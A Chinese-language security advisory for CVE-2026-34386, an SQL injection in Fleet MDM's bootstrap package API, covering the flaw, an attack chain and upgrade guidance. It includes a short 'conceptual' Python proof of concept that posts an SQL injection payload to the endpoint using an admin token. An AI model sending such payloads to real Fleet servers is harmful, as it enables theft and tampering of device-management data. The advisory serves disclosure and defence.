CVE-2026-34386 CVSS 8.8 高危

CVE-2026-34386 Fleet MDM SQL注入漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34386

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fleet

漏洞概述

Fleet是一款开源设备管理软件。在4.81.0版本之前，其MDM bootstrap package配置中存在SQL注入漏洞。拥有Team Admin或Global Admin权限的认证攻击者可以通过直接API调用利用该漏洞，修改任意团队配置、窃取数据库敏感数据，并在团队配置中注入任意内容。该问题已在4.81.0版本中修复。

技术细节

该漏洞的根本原因是Fleet在处理MDM bootstrap package配置请求时，后端服务器未能对用户输入进行充分的净化和验证，导致存在SQL注入缺陷。攻击者必须首先获取到Team Admin或Global Admin级别的认证账户。在获得合法身份后，攻击者可以直接调用受影响的API接口，并在构造的HTTP请求中嵌入恶意的SQL代码。当后端数据库执行该请求时，恶意代码会被拼接进SQL语句并执行。利用此漏洞，攻击者可以进行时间盲注或联合查询攻击，从而读取Fleet数据库中的敏感数据（如主机信息、用户凭据），或者通过INSERT/UPDATE语句修改任意团队的配置，甚至写入恶意内容，造成严重的数据泄露和完整性破坏。

攻击链分析

STEP 1

1. 权限获取

攻击者通过钓鱼或凭证泄露获取Team Admin或Global Admin级别的账户凭证。

STEP 2

2. 漏洞探测

攻击者构造包含恶意SQL语句的API请求，发送至Fleet的MDM bootstrap package配置接口。

STEP 3

3. 数据窃取与篡改

后端数据库执行恶意SQL，攻击者读取敏感数据或修改团队配置，完成攻击目标。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual Proof of Concept for CVE-2026-34386
# Target: Fleet MDM bootstrap package configuration endpoint
# Note: Requires valid Team Admin or Global Admin credentials

target_url = "https://<fleet-domain>/api/v1/fleet/mdm/bootstrap/packages"
api_token = "<YOUR_ADMIN_API_TOKEN>"

headers = {
    "Authorization": f"Bearer {api_token}",
    "Content-Type": "application/json"
}

# The injection point is likely within the package configuration parameters
# This payload attempts a basic SQL injection to test vulnerability
malicious_payload = {
    "name": "TestPackage' OR 1=1; --",
    "description": "Testing SQL injection via bootstrap package"
}

try:
    response = requests.post(target_url, json=malicious_payload, headers=headers, verify=False)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Analyze response and server logs for SQL execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

Fleet < 4.81.0

防御指南

临时缓解措施

建议立即将Fleet升级至4.81.0或更高版本以彻底修复该漏洞。若暂时无法升级，应严格审查和监控所有Team Admin及Global Admin账户的活动日志，并可在WAF层部署针对SQL注入攻击的规则进行临时拦截。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表